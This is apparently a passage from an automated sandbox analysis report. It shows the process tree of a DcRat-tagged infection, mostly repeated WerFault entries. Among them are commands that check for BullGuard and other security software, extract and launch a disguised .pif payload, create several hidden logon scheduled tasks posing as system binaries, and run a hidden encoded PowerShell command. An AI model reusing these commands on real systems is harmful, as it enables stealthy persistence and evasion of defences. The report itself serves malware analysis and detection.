                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:4224
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3944 -ip 3944
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:212
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3944 -ip 3944
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:4684
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3944 -ip 3944
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:3488
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3944 -ip 3944
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:3868
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3944 -ip 3944
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:4472
                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                            PID:1864
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4692 -ip 4692
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:4560
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4692 -ip 4692
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:1400
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4692 -ip 4692
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:4548
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4692 -ip 4692
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:5076
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4692 -ip 4692
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:4908
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4692 -ip 4692
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:1256
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4692 -ip 4692
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:2520
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:2720
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                cmd
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:4948
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                    tasklist /FI "imagename eq BullGuardCore.exe"
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                                                                                                                    PID:3664
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                                                                    find /I /N "bullguardcore.exe"
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:1280
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                                                                      find /I /N "psuaservice.exe"
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:3768
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                        tasklist /FI "imagename eq PSUAService.exe"
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                                                                                                                        PID:5008
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                        findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:1896
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                                                                                                                                                                                                                          Accostarmi.exe.pif N
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:4780
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4692 -ip 4692
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:2852
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4692 -ip 4692
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:540
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4692 -ip 4692
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:3020
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4692 -ip 4692
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:628
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4692 -ip 4692
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:4184
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4692 -ip 4692
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:1916
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4692 -ip 4692
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:3292
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4692 -ip 4692
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:1444
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4692 -ip 4692
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:2036
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:2384
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:1776
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:1124
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:3472
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:836
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:3860
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:316
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:3324
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:2236
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:4064
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:1988
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:856
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:5020
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:2788
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:4524
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:3912
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:4700
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:320
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:4444
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:2720
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:4708
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:1268
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:1192
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:1804
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:1176
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2712 -ip 2712
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:1964
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 384 -ip 384
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:3584
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 624 -ip 624
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:956
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3508 -ip 3508
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:2216
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 828 -ip 828
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:2096
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3020 -ip 3020
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:2184
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 836 -ip 836
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:3200
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 828 -ip 828
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:316
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 3020 -ip 3020
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:1660
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 836 -ip 836
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:3960
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 384 -ip 384
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:628
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2712 -ip 2712
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:4468
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 384 -ip 384
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4580
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 624 -ip 624
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:2588
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3508 -ip 3508
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:3484
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 384 -ip 384
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4780
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                            PID:4776
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 384 -ip 384
                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                              PID:3256
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 384 -ip 384
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                PID:5088
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1568 -ip 1568
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:3704
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 384 -ip 384
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:1260
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Documents and Settings\explorer.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                    PID:1380
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Netdhcpsvc\sihost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                    PID:3684
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\WUDFxUninstall\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                    PID:4544
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Documents and Settings\cmd.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                    PID:2776
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\System32\mfreadwrite\sihost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                    PID:1072
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.nb-no\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                    PID:1196
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "GjqJZ2_aVPLTP4_PI3IJUpKf" /sc ONLOGON /tr "'C:\odt\GjqJZ2_aVPLTP4_PI3IJUpKf.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                    PID:3536
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\iscsied\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                    PID:2160
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 384 -ip 384
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:1280
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                      schtasks.exe /create /tn "Files" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\wctD721\Files.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                      • DcRat
                                                                                                                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                      PID:2332
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1444 -ip 1444
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:1748
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4684 -ip 4684
                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:628
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:3708
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:992
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
